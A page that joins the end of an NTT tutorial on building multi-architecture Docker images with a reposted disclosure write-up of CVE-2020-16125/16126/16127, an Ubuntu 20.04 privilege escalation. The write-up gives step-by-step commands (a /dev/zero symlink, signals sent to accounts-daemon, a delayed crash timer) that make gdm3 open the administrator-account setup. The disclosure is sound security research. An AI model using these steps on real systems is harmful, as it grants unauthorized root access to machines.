The image contains binaries for both x86_64 and ARM. The image can be executed on any machine with these architectures, without enabling QEMU.

$ docker run --rm example.com/hello:latest
Hello, world!
$ ssh me@my-arm-instance
[me@my-arm-instance]$ uname -sm
Linux aarch64
[me@my-arm-instance]$ docker run --rm example.com/hello:latest
Hello, world!
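To confirm that the pushed tag really is a manifest list covering both architectures, you can also inspect it with the imagetools subcommand (the exact output shape varies by registry):

$ docker buildx imagetools inspect example.com/hello:latest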

Option 2: Cross-compilation mode (difficult, fast)

The QEMU mode incurs significant performance penalty for interpreting ARM instructions on x86_64 (or x86_64 on ARM after the actual release of ARM Mac). If the QEMU mode is too slow for your application, consider using the cross-compilation mode instead.

To cross-compile the GNU Hello example, you need to modify the Dockerfile significantly:

FROM --platform=$BUILDPLATFORM debian:10 AS build
RUN apt-get update && \
    apt-get install -y curl gcc make
RUN curl -o /cross.sh https://raw.githubusercontent.com/tonistiigi/binfmt/18c3d40ae2e3485e4de5b453e8460d6872b24d6b/binfmt/scripts/cross.sh && chmod +x /cross.sh
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
ARG TARGETPLATFORM
RUN /cross.sh install gcc | sh
RUN LDFLAGS=-static \
    ./configure --host $(/cross.sh cross-prefix) && \
    make && \
    mkdir -p /out && \
    mv hello /out

FROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

This Dockerfile contains two essential variables: BUILDPLATFORM and TARGETPLATFORM .

BUILDPLATFORM is pinned to the host platform ("linux/amd64"). TARGETPLATFORM is conditionally set to the target platforms ("linux/amd64" and "linux/arm64") and is used for setting up cross-compilation toolchains like aarch64-linux-gnu-gcc via a helper script, cross.sh. This kind of helper script can be a mess depending on the application’s build scripts, especially in C applications.

For comparison, cross-compiling Go programs is relatively straightforward:

FROM --platform=$BUILDPLATFORM golang:1.14 AS build
ARG TARGETARCH
ENV GOARCH=$TARGETARCH
RUN go get github.com/golang/example/hello && \
    go build -o /out/hello github.com/golang/example/hello

FROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

The image can be built and pushed as follows without enabling QEMU. Cross-compiling GNU hello took only 95.3 seconds.

$ docker buildx create --use --name=cross
$ docker buildx inspect --bootstrap cross
Nodes:
Name:      cross0
Endpoint:  unix:///var/run/docker.sock
Status:    running
Platforms: linux/amd64, linux/386
$ docker buildx build \
    --push -t example.com/hello:latest \
    --platform=linux/amd64,linux/arm64 .
[+] Building 95.3s (16/16) FINISHED

Option 3: Remote mode (easy, fast, but needs an extra machine)

The third option is to use a real ARM machine (e.g. an Amazon EC2 A1 instance) for compiling ARM binaries. This option is as easy as Option 1 and yet as fast as Option 2.

To use this option, you need to have an ARM machine accessible via docker CLI. The easiest way is to use ssh://<USERNAME>@<HOST> URL as follows:

$ docker -H ssh://me@my-arm-instance info
...
Architecture: aarch64
...

Also, depending on the network configuration, you might want to add ControlPersist settings in ~/.ssh/config for faster and more stable SSH connections.

ControlMaster auto
ControlPath ~/.ssh/control-%C
ControlPersist yes

This remote ARM instance can be registered to Docker BuildX using the following commands:

$ docker buildx create --name remote --use
$ docker buildx create --name remote \
    --append ssh://me@my-arm-instance
$ docker buildx build \
    --push -t example.com/hello:latest \
    --platform=linux/amd64,linux/arm64 .
[+] Building 113.4s (22/22) FINISHED

The Dockerfile is the same as in Option 1.

FROM debian:10 AS build
RUN apt-get update && \
    apt-get install -y curl gcc make
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
RUN LDFLAGS=-static \
    ./configure && \
    make && \
    mkdir -p /out && \
    mv hello /out

FROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

In this example, an Intel Mac is used as the local and an ARM machine is used as the remote. But after the release of actual ARM Mac, you will do the opposite: use an ARM Mac as the local and an x86_64 machine as the remote.

Performance comparison

  1. QEMU mode: 498.0s
  2. Cross-compilation mode: 95.3s
  3. Remote mode: 113.4s

The QEMU mode is the easiest, but taking 498 seconds seems too slow for compiling “hello world”. The cross-compilation mode is the fastest, but modifying the Dockerfile can be a mess. I suggest using the remote mode whenever possible.

We’re hiring!

NTT is looking for engineers who work in Open Source communities like Kubernetes & Docker projects. If you wish to work on such projects please do visit our recruitment page.

To know more about NTT contribution towards open source projects please visit our Software Innovation Center page. We have a lot of maintainers and contributors in several open source projects.

Our offices are located in the downtown area of Tokyo (Tamachi, Shinagawa) and Musashino.

How to get root on Ubuntu 20.04 by pretending nobody’s /home

How to get root on Ubuntu 20.04 by pretending nobody’s /home

Original text by Kevin Backhouse

I am a fan of Ubuntu, so I would like to help make it as secure as possible. I have recently spent quite a bit of time looking for security vulnerabilities in Ubuntu’s system services, and it has mostly been an exercise in frustration. I have found (and reported) a few issues, but the majority have been low severity. Ubuntu is open source, which means that many people have looked at the source code before me, and it seems like all the easy bugs have already been found. In other words, I don’t want this blog post to give you the impression that Ubuntu is full of trivial security bugs; that’s not been my impression so far.

This blog post is about an astonishingly straightforward way to escalate privileges on Ubuntu. With a few simple commands in the terminal, and a few mouse clicks, a standard user can create an administrator account for themselves. I have made a short demo video, to show how easy it is.

It’s unusual for a vulnerability on a modern operating system to be this easy to exploit. I have, on some occasions, written thousands of lines of code to exploit a vulnerability. Most modern exploits involve complicated trickery, like using a memory corruption vulnerability to forge fake objects in the heap, or replacing a file with a symlink with microsecond accuracy to exploit a TOCTOU vulnerability. So these days it’s relatively rare to find a vulnerability that doesn’t require coding skills to exploit. I also think the vulnerability is easy to understand, even if you have no prior knowledge of how Ubuntu works or any security research experience.

Disclaimer: For someone to exploit this vulnerability, they need access to the graphical desktop session of the system, so this issue affects desktop users only.

Exploitation steps

Here is a description of the exploitation steps, as shown in the demo video.

First, open a terminal and create a symlink in your home directory:

ln -s /dev/zero .pam_environment

(If that doesn’t work because a file named .pam_environment already exists, then just temporarily rename the old file so that you can restore it later.)
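
For example (a minimal sketch; the .bak suffix is an arbitrary choice):

mv ~/.pam_environment ~/.pam_environment.bak   # set the original aside
ln -s /dev/zero ~/.pam_environment             # then create the symlink
# ...after you have deleted the symlink later, put the original back:
mv ~/.pam_environment.bak ~/.pam_environment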

Next, open “Region & Language” in the system settings and try to change the language. The dialog box will freeze, so just ignore it and go back to the terminal. At this point, a program named accounts-daemon is consuming 100% of a CPU core, so your computer may become sluggish and start to get hot.

In the terminal, delete the symlink. Otherwise you might lock yourself out of your own account!

rm .pam_environment

The next step is to send a SIGSTOP signal to accounts-daemon to stop it from thrashing that CPU core. But to do that, you first need to know accounts-daemon’s process identifier (PID). In the video, I do that by running top, which is a utility for monitoring the running processes. Because accounts-daemon is stuck in an infinite loop, it quickly goes to the top of the list. Another way to find the PID is with the pidof utility:

$ pidof accounts-daemon
597

Armed with accounts-daemon’s PID, you can use kill to send the SIGSTOP signal:

kill -SIGSTOP 597

Your computer can take a breather now.
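
If you prefer not to copy the PID by hand, the lookup and the signal can be combined into one command (a sketch):

kill -SIGSTOP "$(pidof accounts-daemon)"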

Here is the crucial step. You’re going to log out of your account, but first you need to set a timer to reset accounts-daemon after you have logged out. Otherwise you’ll just be locked out and the exploit will fail. (Don’t worry if this happens: everything will be back to normal after a reboot.) This is how to set the timer:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

The nohup utility is a simple way to leave a script running after you have logged out, and the trailing & runs it in the background so that you get your prompt back in time to log out. This command tells it to run a bash script that does three things:

  1. Sleep for 30 seconds. (You just need to give yourself enough time to log out. I set it to 10 seconds for the video.)
  2. Send accounts-daemon a SIGSEGV signal, which will make it crash.
  3. Send accounts-daemon a SIGCONT signal to deactivate the SIGSTOP, which you sent earlier. The SIGSEGV won’t take effect until the SIGCONT is received (see the short demonstration after this list).
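
That stop/continue behavior is ordinary POSIX signal semantics, which you can verify on a harmless process first (a short demo, unrelated to the exploit itself):

sleep 300 &           # a throwaway process to experiment on
kill -SIGSTOP $!      # stop it
kill -SIGTERM $!      # a stopped process holds incoming signals as pending
ps -o stat= -p $!     # prints 'T': still stopped, still alive
kill -SIGCONT $!      # continuing it delivers the pending SIGTERM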

Once the timer is set, log out and wait a few seconds for the SIGSEGV to detonate. If the exploit is successful, then you will be presented with a series of dialog boxes which let you create a new user account. The new user account is an administrator account. (In the video, I run id to show that the new user is a member of the sudo group, which means that it has root privileges.)

Victory!

How does it work?

Stay with me! Even if you have no prior knowledge of how Ubuntu (or more specifically, GNOME) works, I reckon I can explain this vulnerability to you. There are actually two bugs involved. The first is in accountsservice, which is a service that manages user accounts on the computer. The second is in GNOME Display Manager (gdm3), which, among other things, handles the login screen. I’ll explain each of these bugs separately below.

accountsservice denial of service (GHSL-2020-187, GHSL-2020-188 / CVE-2020-16126, CVE-2020-16127)

The accountsservice daemon (accounts-daemon) is a system service that manages user accounts on the machine. It can do things like create a new user account or change a user’s password, but it can also do less security-sensitive things like change a user’s icon or their preferred language. Daemons are programs that run in the background and do not have their own user interface. However, the system settings dialog box can communicate with accounts-daemon via a message system known as D-Bus.

System Settings: Users

System Settings: Region & Language

In the exploit, I use the system settings dialog box to change the language. A standard user is allowed to change that setting on their own account; administrator privileges are not required. Under the hood, the system settings dialog box sends the org.freedesktop.Accounts.User.SetLanguage command to accounts-daemon, via D-Bus.

It turns out that Ubuntu uses a modified version of accountsservice that includes some extra code that doesn’t exist in the upstream version maintained by freedesktop. Ubuntu’s patch adds a function named is_in_pam_environment, which looks for a file named .pam_environment in the user’s home directory and reads it. The denial of service vulnerability works by making .pam_environment a symlink to /dev/zero. /dev/zero is a special file that doesn’t actually exist on disk. It is provided by the operating system and behaves like an infinitely long file in which every byte is zero. When is_in_pam_environment tries to read .pam_environment, it gets redirected to /dev/zero by the symlink, and then gets stuck in an infinite loop because /dev/zero is infinitely long.
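
You can observe this behavior directly without touching accountsservice (a harmless demo; pam_env_demo is a throwaway filename):

ln -s /dev/zero pam_env_demo
head -c 16 pam_env_demo | od -An -tx1   # an endless supply of zero bytes
wc -l pam_env_demo                      # never returns: /dev/zero has no EOF (Ctrl-C to stop)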

There’s a second part to this bug. The exploit involves crashing accounts-daemon by sending it a SIGSEGV. Surely a standard user shouldn’t be allowed to crash a system service like that? They shouldn’t, but accounts-daemon inadvertently allows it by dropping privileges just before it starts reading the user’s .pam_environment. Dropping privileges means that the daemon temporarily forfeits its root privileges, adopting instead the lower privileges of the user. Ironically, that’s intended to be a security precaution, the goal of which is to protect the daemon from a malicious user who does something like symlinking their .pam_environment to /etc/shadow, which is a highly sensitive file that standard users aren’t allowed to read. Unfortunately, when done incorrectly, it also grants the user permission to send the daemon signals, which is why we’re able to send accounts-daemon a SIGSEGV.
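
While the daemon is stuck in the read loop, you can observe the dropped privileges from the outside. A hedged check (which of the listed IDs changes depends on exactly how the daemon drops privileges):

ps -o pid,ruser,euser,comm -p "$(pidof accounts-daemon)"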

gdm3 privilege escalation due to unresponsive accounts-daemon (GHSL-2020-202 / CVE-2020-16125)

GNOME Display Manager (gdm3) is a fundamental component of Ubuntu’s user interface. It handles things like starting and stopping user sessions when they log in and out. It also manages the login screen.

gdm3 login screen

Another thing handled by gdm3 is the initial setup of a new computer. When you install Ubuntu on a new computer, one of the first things that you need to do is create a user account. The initial user account needs to be an administrator so that you can continue setting up the machine, doing things like configuring the wifi and installing applications. Here is a screenshot of the initial setup screen (taken from the exploit video):

gnome-initial-setup

The dialog box that you see in the screenshot is a separate application, called gnome-initial-setup. It is triggered by gdm3 when there are zero user accounts on the system, which is the expected scenario during the initial setup of a new computer. How does gdm3 check how many users there are on the system? You probably already guessed it: by asking accounts-daemon! So what happens if accounts-daemon is unresponsive? The relevant code is here.

It uses D-Bus to ask accounts-daemon how many users there are, but since accounts-daemon is unresponsive, the D-Bus method call fails due to a timeout. (In my testing, the timeout took around 20 seconds.) Due to the timeout error, the code does not set the value of priv->have_existing_user_accounts. Unfortunately, the default value of priv->have_existing_user_accounts is false, not true, so now gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.
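
You can make the same kind of D-Bus query yourself and watch it hang while accounts-daemon is stopped. A sketch using busctl from systemd; ListCachedUsers is part of the accountsservice D-Bus API, though gdm3’s exact query may differ:

busctl call org.freedesktop.Accounts /org/freedesktop/Accounts \
    org.freedesktop.Accounts ListCachedUsers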

How did I find it?

I have a confession to make: I found this bug completely by accident. This is the message that I sent to my colleagues at approximately 10pm BST on October 14:

I just got LPE by accident, but I am not quite sure how to reproduce it. 🤦

Here’s what happened: I had found a couple of denial-of-service vulnerabilities in accountsservice. I considered them low severity, but was writing them up for a vulnerability report to send to Ubuntu. Around 6pm, I stopped work and closed my laptop lid. Later in the evening, I opened the laptop lid and discovered that I was locked out of my account. I had been experimenting with the .pam_environment symlink and had forgotten to delete it before closing the lid. No big deal: I used Ctrl-Alt-F4 to open a console, logged in (the console login was not affected by the accountsservice DOS), and killed accounts-daemon with a SIGSEGV. I didn’t need to use sudo due to the privilege dropping vulnerability. The next thing I knew, I was looking at the gnome-initial-setup dialog boxes, and was amazed to discover that I was able to create a new user with administrator privileges.

Unfortunately, when I tried to reproduce the same sequence of steps, I couldn’t get it to work again. I checked the system logs for clues, but there wasn’t much information because I didn’t have gdm’s debug messages enabled. The exploit that I have since developed requires the user to log out of their account, but I definitely didn’t do that on the evening of October 14. So it remains a mystery how I accidentally triggered the bug that evening.

Later that evening, I sent further messages to my (US-based) colleagues describing what had happened. Talking about the dialog boxes helped to jog my memory about something that I had noticed recently. Many of the system services that I have been looking at use policykit to check whether the client is authorized to request an action. I had noticed a file called gnome-initial-setup.pkla, which is a policykit configuration file that grants a user named gnome-initial-setup the ability to do a number of security-sensitive things, such as mounting filesystems and creating new user accounts. So I said to my colleagues: “I wonder if it has something to do with gnome-initial-setup,” and Bas Alberts almost immediately jumped in with a hypothesis that turned out to be right on the money: “You tricked gdm into launching gnome-initial-setup, I reckon, which maybe happens if a gdm session can’t verify that an account already exists.”

After that, it was just a matter of finding the code in gdm3 that triggers gnome-initial-setup and figuring out how to trigger it while accounts-daemon is unresponsive. I found that the relevant code is triggered when a user logs out.

And that’s the story of how the end of my workday was the start of an 0-day!